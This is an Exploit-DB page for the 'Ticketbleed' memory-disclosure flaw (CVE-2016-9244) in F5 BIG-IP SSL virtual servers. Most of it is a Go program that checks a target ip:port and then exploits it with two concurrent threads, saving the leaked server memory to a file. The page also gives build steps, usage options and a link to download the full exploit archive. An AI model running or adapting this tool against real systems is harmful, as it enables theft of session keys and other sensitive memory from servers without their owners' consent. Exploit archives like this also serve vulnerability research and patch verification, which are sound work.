F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure

EDB-ID:

41298

CVE:

2016-9244

EDB Verified:

Author:

Ege Balci

Type:

remote

Exploit:   /  

Platform:

Hardware

Date:

2017-02-10

Vulnerable App: 
/*
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
# Date: [10.02.2017]
# Exploit Author: [Ege Balcı]
# Vendor Homepage: [https://f5.com/]
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
# Tested on: [Multiple]
# CVE : [CVE-2016-9244]




BUILD:
	go get github.com/EgeBalci/Ticketbleed
	go build Ticketbleed.go

USAGE:
	./ticketbleed <options> <ip:port>
OPTIONS:
	-o, --out 	Output filename for raw memory
	-s, --size 	Size in bytes to read
	-h, --help 	Print this message

*/
package main

import "github.com/EgeBalci/Ticketbleed"
import "strconv"
import "strings"
import "fmt"
import "os"


var OutputFile string = ""
var BleedSize int = 0

func main() {


	ARGS := os.Args[1:]
	if len(ARGS) < 1 || len(ARGS) > 5{
		fmt.Println(Help)
		os.Exit(1)
	}

  	for i := 0; i < len(ARGS); i++{

		if ARGS[i] == "-h" || ARGS[i] == "--help"{
			fmt.Println(Help)
			os.Exit(1)
	  	}

		if ARGS[i] == "-o" || ARGS[i] == "--out"{
			OutputFile = ARGS[i+1]
	  	}

	  	if ARGS[i] == "-s" || ARGS[i] == "--size"{
	  		Size,err := strconv.Atoi(ARGS[i+1])
	  		if err != nil {
	  			fmt.Println("[-] ERROR: Invalid size value !")
	  			os.Exit(1)
	  		}
	  		if Size < 0 {
	  			fmt.Println("[-] ERROR: Size can't be smaller than 0")
	  			os.Exit(1)
	  		}else{
	  			BleedSize = Size
	  		}
	  	}
 	}

	if OutputFile != "" {
		File, FileErr := os.Create(OutputFile)
		if FileErr != nil {
			fmt.Println("[-] ERROR: While creating output file !")
			os.Exit(1)
		}
		File.Close()
		fmt.Println("[*] Output file: "+OutputFile)
	}

 	VulnStatus := Ticketbleed.Check(ARGS[0])								// First check if it's vulnerable
 	fmt.Println(VulnStatus)
 	if strings.Contains(VulnStatus, "[+]") {
 		
 		go Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))  		// With using multiple threads it is easyer to move on stack
 		Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))				// Othervise server echoes back alot of duplicate value
 	}

}



var Help string = `
▄▄▄█████▓ ██▓ ▄████▄   ██ ▄█▀▓█████▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄ 
▓  ██▒ ▓▒▓██▒▒██▀ ▀█   ██▄█▒ ▓█   ▀▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
▒ ▓██░ ▒░▒██▒▒▓█    ▄ ▓███▄░ ▒███  ▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒▓██ █▄ ▒▓█  ▄░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
  ▒██▒ ░ ░██░▒ ▓███▀ ░▒██▒ █▄░▒████▒ ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
  ▒ ░░   ░▓  ░ ░▒ ▒  ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒ 
    â–‘     â–’ â–‘  â–‘  â–’   â–‘ â–‘â–’ â–’â–‘ â–‘ â–‘  â–‘   â–‘    â–’â–‘â–’   â–‘ â–‘ â–‘ â–’  â–‘ â–‘ â–‘  â–‘ â–‘ â–‘  â–‘ â–‘ â–’  â–’ 
  â–‘       â–’ â–‘â–‘        â–‘ â–‘â–‘ â–‘    â–‘    â–‘       â–‘    â–‘   â–‘ â–‘      â–‘      â–‘    â–‘ â–‘  â–‘ 
          â–‘  â–‘ â–‘      â–‘  â–‘      â–‘  â–‘         â–‘          â–‘  â–‘   â–‘  â–‘   â–‘  â–‘   â–‘    
             â–‘                                    â–‘                        â–‘      

Author: Ege Balci
Github: github.com/EgeBalci


USAGE: 
	./ticketbleed <ip:port> <options> 
OPTIONS:
	-o, --out 	Output filename for raw memory
	-s, --size 	Size in bytes to read
	-h, --help 	Print this message
`

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41298.zip
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services